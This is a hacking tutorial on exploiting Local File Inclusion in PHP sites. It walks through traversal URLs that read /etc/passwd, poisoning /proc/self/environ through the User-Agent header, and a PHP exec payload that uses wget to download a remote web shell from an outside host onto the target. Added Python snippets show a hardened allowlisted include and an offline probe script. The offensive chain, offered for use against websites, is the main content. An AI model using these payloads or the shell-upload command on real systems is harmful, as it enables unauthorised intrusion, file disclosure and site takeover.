Hey all, in this tutorial I will explain LFI (Local File Inclusion) and how to upload a shell through it.
What Is LFI ?
LFI (Local File Inclusion) attacks occur in a web application when a parameter is not validated before being passed to a file-inclusion call such as include(). Through this flaw an attacker can read arbitrary files the web server user can access (configuration files, /etc/passwd, source code) and, where the included content is parsed as PHP, execute code and deface the site by dropping a shell. It is an input-validation flaw, not an overflow.
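As an added example (not code from the tutorial), here is the include-by-parameter pattern modelled in Python, with the vulnerable version beside a hardened one. The temporary directory layout, file contents and the names include_vulnerable / include_hardened / hardened_rejects are constructed for this demo; the directory depth mirrors the tutorial's /home/sirgod/public_html/website.com/view.php.

```python
"""Vulnerable include-by-parameter logic beside a hardened version.

Added example, not code from the tutorial. A temporary directory stands in
for the filesystem, with the "script" four directories below its root,
exactly like the tutorial's target (layout and contents are constructed).
"""
import os
import tempfile

# realpath() so that a symlinked temp dir (e.g. /var -> /private/var) cannot
# make the containment check below fail for legitimate pages.
FS_ROOT = os.path.realpath(tempfile.mkdtemp())
WEBROOT = os.path.join(FS_ROOT, "home", "sirgod", "public_html", "website.com")
os.makedirs(WEBROOT)
with open(os.path.join(WEBROOT, "contact.php"), "w") as fh:
    fh.write("contact page")
os.makedirs(os.path.join(FS_ROOT, "etc"))
with open(os.path.join(FS_ROOT, "etc", "passwd"), "w") as fh:
    fh.write("root:x:0:0:root:/root:/bin/bash\nnobody:x:99:99:Nobody:/:/sbin/nologin\n")


def include_vulnerable(page):
    """Equivalent of include($_GET['page']): the value is used unchecked."""
    with open(os.path.join(WEBROOT, page)) as fh:
        return fh.read()


ALLOWED_PAGES = {"contact.php", "about.php"}   # constructed allowlist


def include_hardened(page):
    """Allowlist the value, then check the resolved path is still under WEBROOT."""
    if page not in ALLOWED_PAGES:
        raise ValueError("page not in allowlist: %r" % page)
    path = os.path.realpath(os.path.join(WEBROOT, page))
    # Defence in depth: even an allowlisted name must not resolve outside
    # WEBROOT (guards against a symlink or a careless later allowlist entry).
    if os.path.commonpath([path, WEBROOT]) != WEBROOT:
        raise ValueError("path escapes web root: %r" % path)
    with open(path) as fh:
        return fh.read()


def hardened_rejects(page):
    """True if include_hardened() refuses the value."""
    try:
        include_hardened(page)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Four '../' climb from website.com/ to FS_ROOT. On a real server extra
    # '../' past '/' are harmless ('/..' is still '/'); in this temp-dir
    # stand-in they would climb above FS_ROOT, so the exact depth is used.
    print(include_vulnerable("../../../../etc/passwd"))
    print("hardened rejects traversal:", hardened_rejects("../../../../etc/passwd"))
```

The allowlist is the real fix; the realpath containment check is there so that a single mistake in the allowlist does not silently reopen the hole.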
Things Required
- LFI Vulnerable site
- User-Agent Switcher ( https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ ) or Tamper Data ( https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ ); anything that lets you set the User-Agent header works, curl -A does the same from the command line
- A remote shell
Finding LFI Vulnerable Site
Now we are going to find a Local File Inclusion vulnerable website. Suppose we have found our target; let's check it.
www.website.com/view.php?page=contact.php
Now lets replace contact.php with ../ so the URL will become
www.website.com/view.php?page=../
and we got an error
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
This shows that there may be a vulnerability on our target: the parameter goes straight into include(), and the warning also leaks the script's absolute path, /home/sirgod/public_html/website.com/view.php, which tells us how many directories we have to climb to reach the filesystem root.
Checking /etc/passwd to confirm the target is vulnerable
www.website.com/view.php?page=../../../etc/passwd
we got an error and no /etc/passwd:
Warning: include(../../../etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
Three ../ from /home/sirgod/public_html/website.com/ only get us to /home/etc/passwd, which doesn't exist. The leaked path shows the script is four directories deep, so we go further up (extra ../ beyond the root are harmless, since /.. is still /):
www.website.com/view.php?page=../../../../../etc/passwd
we successfully included /etc/passwd and get a result something like this:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
Checking if /proc/self/environ is accessible
Now let's see if /proc/self/environ is accessible. We replace etc/passwd with proc/self/environ:
www.website.com/view.php?page=../../../../../proc/self/environ
If you get something like this (the sample below was captured from a script called index.php with a view parameter rather than view.php?page=, but the shape is the same):
DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
then /proc/self/environ is accessible. If you get a blank page or an error, /proc/self/environ is not readable (permissions or open_basedir), or the OS is not Linux (FreeBSD, for example, does not provide it). One more thing to check before moving on: the sample shows GATEWAY_INTERFACE=CGI/1.1 and the request's HTTP_* headers in the environment, which is what makes the next step work. When PHP runs as an Apache module instead, /proc/self/environ belongs to the long-lived worker process and only holds Apache's startup environment, so request headers never appear in it.
Injecting malicious code and Uploading Shell
Now let's inject our code into /proc/self/environ. How? Under CGI the request headers are copied into the process environment as HTTP_* variables, so anything we put in the User-Agent header ends up in the file, and because include() parses whatever it reads as PHP, a <?php ... ?> tag in that header gets executed.
For that, install the User-Agent Switcher add-on, open it and click New > New User-Agent (Tamper Data lets you edit the header on a single request instead).
In the User Agent field enter
<?php phpinfo();?>
give the entry any description you like, click OK and reload the environ URL. If the code runs you get the phpinfo() page in the tab. If instead the tag is echoed back verbatim, the file is only being displayed, not executed (the page uses something like readfile() or file_get_contents() rather than include()), and this technique will not work there.
Now go back to the user agents, replace the User Agent with
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>
click OK and reload the environ URL once more.
(Replace http://www.sh3ll.org/egy.txt with the link to your own remote shell; -O writes the download as shell.php in the current working directory, which for a PHP script is normally the script's own directory, i.e. the web root. The short <? tag only works when short_open_tag is enabled; <?php exec(...); ?> always does. The step also needs exec() not to be listed in disable_functions, wget present on the server, outbound HTTP allowed, and the web server user able to write to that directory.)
If all of that holds, the shell is now on the site and you will reach it at a link like
www.website.com/shell.php
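The whole probe sequence above (climb one directory at a time until /etc/passwd is included, confirm /proc/self/environ reflects the User-Agent, then tell "PHP executed my tag" apart from "the tag was merely displayed") as an added Python example, not code from the tutorial. The HTTP side is abstracted as a fetch(page, headers) callable so it runs offline; fake_fetch, FAKE_FILES and SCRIPT_DIR are a constructed stand-in for the tutorial's target (view.php four directories below /, CGI-style environ). Swap in a real fetcher built on urllib or requests to use it against a lab host you are authorised to test.

```python
"""Offline walkthrough of the tutorial's LFI probe sequence (added example)."""
import re

PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.M)   # first line of a real /etc/passwd


def traversal(depth, target):
    """'../' * depth followed by the target path without its leading '/'."""
    return "../" * depth + target.lstrip("/")


def find_depth(fetch, target="etc/passwd", max_depth=10):
    """Walk upward one directory at a time until /etc/passwd is included."""
    for depth in range(1, max_depth + 1):
        body = fetch(traversal(depth, target), {})
        if PASSWD_RE.search(body):
            return depth
    return None


def environ_reflects_header(fetch, depth):
    """Send a harmless marker in User-Agent and see if /proc/self/environ echoes it."""
    marker = "lfi-probe-7f3a"   # constructed marker string
    body = fetch(traversal(depth, "proc/self/environ"), {"User-Agent": marker})
    return ("HTTP_USER_AGENT=" + marker) in body


def php_canary(fetch, depth):
    """'executed' if PHP ran the tag, 'reflected' if it came back verbatim, else 'none'."""
    tag = "<?php echo 'lfi' . 'canary'; ?>"   # output 'lficanary' never appears verbatim in the tag
    body = fetch(traversal(depth, "proc/self/environ"), {"User-Agent": tag})
    if "lficanary" in body:
        return "executed"
    if tag in body:
        return "reflected"
    return "none"


# ---- constructed fake target standing in for www.website.com ----------------
FAKE_FILES = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nnobody:x:99:99:Nobody:/:/sbin/nologin\n",
}
SCRIPT_DIR = "/home/sirgod/public_html/website.com"   # from the leaked warning


def fake_fetch(page, headers):
    """Emulates include($_GET['page']) relative to SCRIPT_DIR plus a CGI environ.

    It only displays the environ, it does not run PHP found in it, so the
    canary comes back 'reflected'; a real CGI/suPHP target would execute it.
    """
    parts = SCRIPT_DIR.strip("/").split("/")
    for seg in page.split("/"):
        if seg == "..":
            if parts:            # '..' at '/' stays at '/', as on a real filesystem
                parts.pop()
        elif seg:
            parts.append(seg)
    path = "/" + "/".join(parts)
    if path == "/proc/self/environ":
        env = {"DOCUMENT_ROOT": "/home/sirgod/public_html", "GATEWAY_INTERFACE": "CGI/1.1"}
        for key, value in headers.items():
            env["HTTP_" + key.upper().replace("-", "_")] = value
        return "".join("%s=%s\x00" % (k, v) for k, v in env.items())   # NUL-separated like the real file
    if path in FAKE_FILES:
        return FAKE_FILES[path]
    return ("Warning: include(%s) [function.include]: failed to open stream: "
            "No such file or directory" % page)


if __name__ == "__main__":
    depth = find_depth(fake_fetch)
    print("depth:", depth)
    print("environ reflects User-Agent:", environ_reflects_header(fake_fetch, depth))
    print("canary:", php_canary(fake_fetch, depth))
```

The canary step is the one the tutorial skips: seeing your User-Agent in the environ output only proves the header reaches the file, while seeing the tag's output rather than the tag itself proves include() is parsing it as PHP, which is what the wget payload depends on.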